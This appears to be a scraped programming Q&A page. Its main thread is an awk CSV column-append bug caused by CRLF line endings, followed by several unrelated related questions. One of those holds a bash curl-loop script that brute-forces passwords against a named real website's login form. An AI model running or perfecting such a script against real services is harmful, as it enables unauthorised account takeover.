Shell script CSV processing - adding new column with AWK - bash

I have a shell script which processes CSV file. One step in particular is adding a column and putting default value "null" in it. I got the expected change, its just that the new column to be added gets added to the next line instead of the same line.
Can anyone suggest whats wrong in the code and causing this unexpected change?
CODE:
awk 'BEGIN{FS=",";OFS=";"} {$(NF+1) = NR==1 ? "NewColm" : "NULL"} 1' source.csv > final.csv
Input CSV:
OldColm1,OldColm2,OldColm3,OldColm4,OldColm5,OldColm6
Value1,Value2,Value3,Value4,Value5,Value6
Output CSV:
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6
;NewColm
Value1;Value2;Value3;Value4;Value5;Value6
;NULL
Expected CSV:
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6;NewColm
Value1;Value2;Value3;Value4;Value5;Value6;NULL

As explained in the comments, this was caused by the lines being separated by \r\n instead of \n.
The od programm can be used to illustrate this:
cat source_dos.csv
OldColm1,OldColm2,OldColm3,OldColm4,OldColm5,OldColm6
Value1,Value2,Value3,Value4,Value5,Value6
od -c source_dos.csv
0000000 O l d C o l m 1 , O l d C o l m
0000020 2 , O l d C o l m 3 , O l d C o
0000040 l m 4 , O l d C o l m 5 , O l d
0000060 C o l m 6 \r \n V a l u e 1 , V a
0000100 l u e 2 , V a l u e 3 , V a l u
0000120 e 4 , V a l u e 5 , V a l u e 6
0000140 \r \n
0000142
awk 'BEGIN{FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv
;NewColm;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6
;NULL1;Value2;Value3;Value4;Value5;Value6
awk 'BEGIN{FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 \r ; N e w C o l m \n V
0000100 a l u e 1 ; V a l u e 2 ; V a l
0000120 u e 3 ; V a l u e 4 ; V a l u e
0000140 5 ; V a l u e 6 \r ; N U L L \n
0000157
A work-around solution provided in the comments is to convert the input from DOS-like (\r) to UNIX-like (\n) input:
cp source_dos.csv source_unix.csv && dos2unix source_unix.csv
dos2unix: converting file source_unix.csv to Unix format ...
od -c source_unix.csv
0000000 O l d C o l m 1 , O l d C o l m
0000020 2 , O l d C o l m 3 , O l d C o
0000040 l m 4 , O l d C o l m 5 , O l d
0000060 C o l m 6 \n V a l u e 1 , V a l
0000100 u e 2 , V a l u e 3 , V a l u e
0000120 4 , V a l u e 5 , V a l u e 6 \n
0000140
awk 'BEGIN{FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_unix.csv
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6;NewColm
Value1;Value2;Value3;Value4;Value5;Value6;NULL
awk 'BEGIN{FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_unix.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 ; N e w C o l m \n V a
0000100 l u e 1 ; V a l u e 2 ; V a l u
0000120 e 3 ; V a l u e 4 ; V a l u e 5
0000140 ; V a l u e 6 ; N U L L \n
0000155
An awk-only solution to deal with this would be to adjust the record separator RS accordingly.
RS, as well as its counterpart the output record separator ORS, default to \n.
That's why in the \r\n input case, the \r remains part of the last input column and your new column gets 'stuck' in between this \r and the \n added as ORS.
Changing RS solves this:
awk 'BEGIN{RS="\r\n";FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6;NewColm
Value1;Value2;Value3;Value4;Value5;Value6;NULL
Note that this will still create UNIX-like (\n) output:
awk 'BEGIN{RS="\r\n";FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 ; N e w C o l m \n V a
0000100 l u e 1 ; V a l u e 2 ; V a l u
0000120 e 3 ; V a l u e 4 ; V a l u e 5
0000140 ; V a l u e 6 ; N U L L \n
0000155
To generate DOS-like (\r\n) output, just adjust ORS, too:
awk 'BEGIN{RS="\r\n";ORS=RS;FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6;NewColm
Value1;Value2;Value3;Value4;Value5;Value6;NULL
awk 'BEGIN{RS="\r\n";ORS=RS;FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 ; N e w C o l m \r \n V
0000100 a l u e 1 ; V a l u e 2 ; V a l
0000120 u e 3 ; V a l u e 4 ; V a l u e
0000140 5 ; V a l u e 6 ; N U L L \r \n
0000157
Note however that this will fail for UNIX-like (\n) input:
awk 'BEGIN{RS="\r\n";FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_unix.csv
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6
Value1;Value2;Value3;Value4;Value5;Value6
;NewColm
awk 'BEGIN{RS="\r\n";FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_unix.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 \n V a l u e 1 ; V a l
0000100 u e 2 ; V a l u e 3 ; V a l u e
0000120 4 ; V a l u e 5 ; V a l u e 6 \n
0000140 ; N e w C o l m \n
0000151
Why I think this is better than using dos2unix:
Using a regular expression (RE) as RS one can make it work for both \n and \r\n-separated input without the need to know which of the two it is:
awk 'BEGIN{RS="\r?\n";FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6;NewColm
Value1;Value2;Value3;Value4;Value5;Value6;NULL
awk 'BEGIN{RS="\r?\n";FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_unix.csv
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6;NewColm
Value1;Value2;Value3;Value4;Value5;Value6;NULL
In both cases, UNIX-like (\n) output will be generated:
awk 'BEGIN{RS="\r?\n";FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 ; N e w C o l m \n V a
0000100 l u e 1 ; V a l u e 2 ; V a l u
0000120 e 3 ; V a l u e 4 ; V a l u e 5
0000140 ; V a l u e 6 ; N U L L \n
0000155
awk 'BEGIN{RS="\r?\n";FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_unix.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 ; N e w C o l m \n V a
0000100 l u e 1 ; V a l u e 2 ; V a l u
0000120 e 3 ; V a l u e 4 ; V a l u e 5
0000140 ; V a l u e 6 ; N U L L \n
0000155
To set the output type according to the input type, the ORS can be set per record to the actual text that matched the RS RE, RT:
awk 'BEGIN{RS="\r?\n";FS=",";OFS=";"}
{ORS=RT}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6;NewColm
Value1;Value2;Value3;Value4;Value5;Value6;NULL
awk 'BEGIN{RS="\r?\n";FS=",";OFS=";"}
{ORS=RT}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_unix.csv
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6;NewColm
Value1;Value2;Value3;Value4;Value5;Value6;NULL
awk 'BEGIN{RS="\r?\n";FS=",";OFS=";"}
{ORS=RT}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 ; N e w C o l m \r \n V
0000100 a l u e 1 ; V a l u e 2 ; V a l
0000120 u e 3 ; V a l u e 4 ; V a l u e
0000140 5 ; V a l u e 6 ; N U L L \r \n
0000157
awk 'BEGIN{RS="\r?\n";FS=",";OFS=";"}
{ORS=RT}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_unix.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 ; N e w C o l m \n V a
0000100 l u e 1 ; V a l u e 2 ; V a l u
0000120 e 3 ; V a l u e 4 ; V a l u e 5
0000140 ; V a l u e 6 ; N U L L \n
0000155
Note that using an RE as RS as well as the RT built-in variable are GNU awk (gawk) extensions and might not be supported by all awk implementations.

Related

Output list items as ls does

I'm trying to output something that resembles as ls output. The ls command outputs like this:
file1.txt file3.txt file5.txt
file2.txt file4.txt
But I this sample list:
a b c d e f g h i j k l m n o p q r s t u v w x y z
to appear as:
a e i m q u y
b f j n r v z
c g k o s w
d h l p t x
In that case, it gave 7 columns which is fine, but I wanted up to 8 columns max. Next the following list:
a b c d e f g h i j k l m n o p q r s t u v w
will have to show as:
a d g j m p s v
b e h k n q t w
c f i l o r u
And "a b c d e f g h" will have to show as is because it is already 8 columns in 1 line, but:
a b c d e f g h i
will show as:
a c e g i
b d f h
And:
a b c d e f g h i j
a c e g i
b d f h j
One way:
#!/usr/bin/env tclsh
proc columnize {lst {columns 8}} {
set len [llength $lst]
set nrows [expr {int(ceil($len / (0.0 + $columns)))}]
set cols [list]
for {set n 0} {$n < $len} {incr n $nrows} {
lappend cols [lrange $lst $n [expr {$n + $nrows - 1}]]
}
for {set n 0} {$n < $nrows} {incr n} {
set row [list]
foreach col $cols {
lappend row [lindex $col $n]
}
puts [join $row " "]
}
}
columnize {a b c d e f g h i j k l m n o p q r s t u v w x y z}
puts ----
columnize {a b c d e f g h i j k l m n o p q r s t u v w}
puts ----
columnize {a b c d e f g h}
puts ----
columnize {a b c d e f g h i}
puts ----
columnize {a b c d e f g h i j}
The columnize function first figures out how many rows are needed with a simple division of the length of the list by the number of columns requested, then splits the list up into chunks of that length, one per column, and finally iterates through those sublists extracting the current row's element for each column, and prints the row out as a space-separated list.

What are the inorder and postorder traversals of the following tree?

With respect to the following tree:
What is the correct inorder traversal?
U S T X C P Y R B A I G J F N H V T E D L
U S T X C P Y R B A D E I G J F N H V T L
What is the correct postorder traversal?
U T S X P R Y C B D I J G N V T H F E L A
U T S X P R Y C B I J G N V T H F E D L A
I evaluated both pairs. But some are saying 1-1 and 2-1 are correct, while others say 1-2 and 2-2 are correct. I'm confused. Which ones are actually correct?
inorder:
B U S T X C P Y R A D E I G J F N H V T L
postorder (2.2 is correct):
U T S X P R Y C B I J G N V T H F E D L A

Brute force my online account password using bash script

I will brute force password on account in https://app.shkolo.bg/ website, but i have difficulties with login in the website. My username is DonchoBonboncho and the password is 8-digits. My code look like this:
#!/bin/bash
curl --cookie-jar cjar --output /dev/null http://app.shkolo.bg/
for a in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
do for b in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
do for c in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
do for d in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
do for e in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
do for f in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
do for g in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
do for h in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
do
echo $a$b$c$d$e$f$g$h;
curl --cookie cjar --cookie-jar cjar \
--data 'username=DonchoBonboncho' \
--data 'password="$a$b$c$d$e$f$g$h"' \
--data 'form_id=user_login' \
--data 'op=Log in' \
--location \
--output ~/loginresult.html \
http://app.shkolo.bg/
done;
done;
done;
done;
done;
done;
done;
done;
I'm not sure for website login and I need help for this.
It don't give me errors or wornings, but it surprisingly accepts (entering in the website) the first password and does not continue.

Exponents are not getting add

I am a beginner in Mathematica and learning from Google.
I was trying to find the determinant of a 4*4 matrix.
TT = {{ap, b, c, d}, {e, fp, g, h}, {i, j, kp, l}, {m, n, o, pq}}
TT // MatrixForm
After it, I applied determinant command.
Det[TT]
I am getting result as follow,
d g j m - c h j m - d fp kp m + b h kp m + c fp l m - b g l m - d g i n + c h i n + d e kp n - ap h kp n - c e l n + ap g l n + d fp i o - b h i o - d e j o + ap h j o + b e l o - ap fp l o - c fp i pq + b g i pq + c e j pq - ap g j pq - b e kp pq + ap fp kp pq
I want above expression as a polynomial in p, want to collect coefficients separately. I have tried various command such as Collect, Factor etc. But each time I get the answer as the same polynomial as above.
I assume you have a*p, f*p, k*p, p*q, instead of ap, fp, kp and pq.
Mathematica needs either space or multiple sign to treat them as a separate multiplier and not as a variable.
t = {{a p, b, c, d}, {e, f p, g, h}, {i, j, k p, l}, {m, n, o,
p q}};
Collect[Det[t], p]
(* d g j m - c h j m - b g l m - d g i n + c h i n - c e l n -
b h i o - d e j o + b e l o + a f k p^4 q +
p (b h k m + c f l m + d e k n + a g l n + d f i o + a h j o +
b g i q + c e j q) +
p^2 (-d f k m - a h k n - a f l o - c f i q - a g j q - b e k q) *)

Getting 3 string before and after of each characters using awk

What I have expected is the output like below:
[before character h is null and assign with '#". After character h
are "e","l","l".]
[before character e is "h". After character e are
"l","l","o".]
[before character l are "h" and "e". After character l
are "l" and "o".]
[before character l are "h" and "e". After character
l are "l" and "o".]
[before character l are "h","e","l". After
character l is "o".]
[before character o are "e","l","l". After
character o is null and assign with '#".]
# # # h e l l
# # h e l l o
# h e l l o #
h e l l o # #
e l l o # # #
# # # w o n d
# # w o n d e
# w o n d e r
w o n d e r f
o n d e r f u
n d e r f u l
d e r f u l #
e r f u l # #
r f u l # # #
Input file:
h e l l o
w o n d e r f u l
Code:
awk -v s1="# # #"
'BEGIN{v=length(s1)}
{$0=s1 $0 s1;num=split($0, A,"");
for(i=v+1;i<=num-v;i++){
q=i-v;p=i+v;
while(q<=p){
Q=Q?Q OFS A[q]:A[q];q++
};
print Q;Q=""
}
}' InputFile
But the result I got is:
# # # h e l
# # h e l l
# # h e l l
# h e l l o
# h e l l o #
h e l l o #
e l l o # #
e l l o # #
l l o # # #
# # # w o n
# # w o n d
# # w o n d
# w o n d e
# w o n d e
w o n d e r
o n d e r
o n d e r f
n d e r f
n d e r f u
d e r f u
d e r f u l
e r f u l #
e r f u l #
r f u l # #
r f u l # #
f u l # # #
How to solve it? Please guide me. Thanks
Add gsub(/ /,"") to the top of #fedorqui's answer to your previous question, change ## to ### and change 5 to 7 and you get:
$ cat tst.awk
{
gsub(/ /,"")
n=length($0)
$0 = "###" $0 "###"
gsub(/./, "& ")
for (i=1; i<=2*n; i+=2)
print substr($0, i, 7*2-1)
print ""
}
$ awk -f tst.awk file
# # # h e l l
# # h e l l o
# h e l l o #
h e l l o # #
e l l o # # #
# # # w o n d
# # w o n d e
# w o n d e r
w o n d e r f
o n d e r f u
n d e r f u l
d e r f u l #
e r f u l # #
r f u l # # #

Resources